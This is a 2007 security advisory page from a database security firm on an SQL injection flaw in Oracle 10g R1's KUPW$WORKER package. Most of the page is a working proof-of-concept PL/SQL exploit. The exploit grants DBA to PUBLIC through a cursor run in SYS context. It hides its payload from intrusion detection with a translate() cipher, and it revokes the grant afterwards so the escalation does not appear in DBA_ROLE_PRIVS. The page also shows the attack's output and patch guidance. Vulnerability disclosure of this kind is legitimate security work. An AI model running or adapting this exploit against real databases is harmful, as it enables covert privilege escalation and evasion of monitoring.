Services
Oracle Audit / Hardening
Security Training
Consulting

Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts

News & Events
Events
News

Company
Contact
People
Partner
Impressum
Sitemap


Search



Search Red-Database-Security
SQL Injection via Oracle KUPW$WORKER in Oracle 10g R1 with IDS evasion

Name SQL Injection via Oracle KUPW$WORKER in Oracle 10g R1
Systems Affected Oracle 10g R1
Severity High Risk
Category SQL Injection
Vendor URL http://www.oracle.com/
Credit Alexander Kornbrust
Date 25 Mar 2007 (V 1.00)

Details

The following proof of concept exploit code injects code for a privilege escalation (grant dba to public) via a cursor. The cursor is executed in the SYS context and grants the DBA permission to public and revokes the privileges directly after that. The advantage of this approach is that the current session has still DBA privileges but this is not visible in the Oracle view DBA_ROLE_PRIVS.

If you compare this exploit code with the exploit from Andrea Purificato you will see that this exploits has less prerequisites (perl is not required, works via isqlplus, smaller (4185 vs 408 bytes)), and has IDS evasion)

Example -- with IDS evasion --
/

SQL> DECLARE
MYC NUMBER;
BEGIN
MYC := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(MYC,translate('uzikpsz fsprjp pnmghgjgna_msphapimwgh) ozrwh zczinmz wjjzuwpmz (rsphm uop mg fnokwi()igjjwm)zhu)',
'poiuztrewqlkjhgfdsamnbvcxy()=!','abcdefghijklmnopqrstuvwxyz'';:='),0);
sys.KUPW$WORKER.MAIN('x',''' and 1=dbms_sql.execute ('||myc||')--');
END;
/

SQL> set role dba;

SQL> revoke dba from public;


SQL> select * from dba_role_privs where granted_role='DBA';

GRANTEE GRANTED_ROLE ADM DEF
------------------------------ ------------------------------ --- ---
SYS DBA YES YES
WKSYS DBA NO YES
SYSMAN DBA NO YES
SYSTEM DBA YES YES




Patch Information
Apply the patches mentioned in Oracle Critical Patch Update July 2006.



2007 by Red-Database-Security GmbH - 25-mar-2007

Definition Exploit
An exploit is a common term in the computer security to refer to a piece of software that take advantage of a bug or vulnerability leading to a privilege escalation or d.o.s. on a computer system.
Computer security experts are using exploit code to test if a patch is working properly.